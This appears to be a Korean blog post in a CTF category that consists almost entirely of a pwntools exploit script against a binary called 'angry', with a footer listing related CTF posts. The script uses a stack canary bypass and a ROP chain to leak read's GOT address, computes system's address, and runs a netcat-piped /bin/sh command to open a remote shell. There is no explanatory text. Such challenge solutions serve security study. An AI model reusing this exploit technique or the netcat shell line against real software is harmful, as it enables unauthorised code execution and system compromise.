from pwn import *
elf = ELF('./angry')
rop = ROP(elf)
read_plt,write_plt = elf.plt['read'], elf.plt['write']
read_got,write_got = elf.got['read'], elf.got['write']
conn = remote('localhost', 8888)
sleep(2.3)
payload = "4\n"
conn.send(payload)
sleep(0.3)
canary = 0x6df37b00
ppppr = 0x080495BC
boom = 0x08048FC6
payload = "y111111111"
payload += p32(canary)
payload += "AAAA"
payload += "AAAA"
payload += "BBBB"
payload += p32(write_plt) # ret
payload += p32(ppppr)
payload += p32(4)
payload += p32(read_got)
payload += p32(4)
payload += p32(0)
payload += p32(boom)
payload += "AAAA"
payload += p32(4)
conn.send(payload)
print conn.recvuntil(">Are you sure? (y/n) ")
read_addr = u32(conn.recv(4))
read_system = 633936
system_addr = read_addr - read_system
print "read_addr : " + hex(read_addr)
print "system_addr : " + hex(system_addr)
cmd = "nc localhost 4567 | /bin/sh | nc localhost 4568;"
bss_addr = 0x0804B0A0
payload = "y111111111"
payload += p32(canary)
payload += "AAAA"
payload += "AAAA"
payload += "BBBB"
payload += p32(read_plt) # ret
payload += p32(ppppr)
payload += p32(4)
payload += p32(bss_addr)
payload += p32(len(cmd))
payload += p32(0)
payload += p32(system_addr)
payload += "AAAA"
payload += p32(bss_addr)
conn.send(payload)
sleep(0.4)
conn.send(cmd)
print conn.recv(1024)
print conn.recv(1024)
'CTF' 카테고리의 다른 글
2016 Layer7 CTF easy_bof exploit only (0) | 2016.09.06 |
---|---|
codegate 2013 vuln200 from rop exploit only (0) | 2016.09.04 |
codegate nuclear pwn tools 사용 (0) | 2016.08.21 |
DEFCON 2016 easy-prasky (0) | 2016.06.06 |
DEFCON 2016 baby-re (from angr) (0) | 2016.05.31 |